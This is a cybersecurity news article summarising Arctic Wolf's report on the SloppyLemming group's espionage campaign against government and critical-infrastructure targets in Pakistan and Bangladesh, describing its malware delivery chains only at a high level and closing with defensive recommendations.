A cyber threat group known as SloppyLemming has been linked to a new campaign targeting government bodies and critical infrastructure operators in Pakistan and Bangladesh. According to cybersecurity firm Arctic Wolf, the activity occurred between January 2025 and January 2026. The attackers employed two separate infection chains to deploy malware identified as BurrowShell and a Rust-based backdoor.
Attack Methodology and Malware Details
The operation utilized two distinct attack chains to compromise targets. The first chain involved the use of malicious Microsoft Office documents. These documents contained macros designed to download and execute a payload from a remote server.
The second chain exploited a legitimate remote management tool. Attackers used this tool to run a PowerShell script, which then fetched and executed the final malware stage. This dual-approach increased the likelihood of a successful infection.
The primary malware delivered is tracked as BurrowShell. This is a sophisticated backdoor that provides attackers with persistent access to compromised systems. It can execute commands, upload and download files, and perform reconnaissance.
In parallel, the group deployed a separate backdoor written in the Rust programming language. Rust-based malware is increasingly popular among threat actors due to its performance and difficulty for security tools to analyze. This backdoor facilitates similar remote control capabilities.
Targets and Geographic Focus
The campaign specifically focused on government entities in Pakistan and Bangladesh. While the exact agencies were not named, the targeting suggests an interest in governmental data and operations.
Critical infrastructure operators in these countries were also identified as targets. Such infrastructure includes sectors like energy, telecommunications, and transportation, where disruptions could have significant national consequences.
The concentrated focus on South Asia indicates a clear geopolitical dimension to the espionage activity. The intent appears to be intelligence gathering and maintaining a foothold within sensitive networks.
Attribution and Group Profile
The activity has been attributed to the threat cluster tracked as SloppyLemming. This group is not widely reported but demonstrates a moderate level of technical sophistication.
Their use of dual delivery methods and malware written in multiple programming languages points to a capable and resourceful operation. The choice of targets aligns with common cyber-espionage objectives.
Arctic Wolf’s report did not attribute the group to a specific nation-state. However, the pattern of targeting government and infrastructure in two neighboring countries is consistent with state-sponsored cyber espionage campaigns.
Security Implications and Response
The discovery of this campaign highlights the ongoing digital threats faced by government institutions worldwide. It underscores the need for robust cybersecurity defenses, particularly in regions of strategic interest.
Security analysts recommend several defensive measures. These include disabling Office macros by default, closely monitoring the use of remote management tools, and implementing application allowlisting.
Network defenders are also advised to hunt for indicators of compromise associated with BurrowShell and the Rust-based backdoor. Early detection is crucial to limiting the damage from such intrusions.
Future Outlook and Investigation
Cybersecurity firms and national computer emergency response teams (CERTs) in the affected regions are expected to continue their investigation. Further technical indicators of compromise are likely to be published to aid the wider security community.
The SloppyLemming group is anticipated to continue its operations, potentially refining its tools and expanding its target list. Ongoing vigilance and international information sharing will be key to mitigating the threat posed by this and similar advanced persistent threat (APT) groups.
Source: Arctic Wolf
